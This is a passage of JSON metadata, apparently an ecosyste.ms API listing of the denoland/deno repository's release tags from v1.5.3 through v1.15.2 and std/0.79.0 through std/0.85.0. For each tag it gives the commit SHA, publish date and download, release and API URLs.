.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5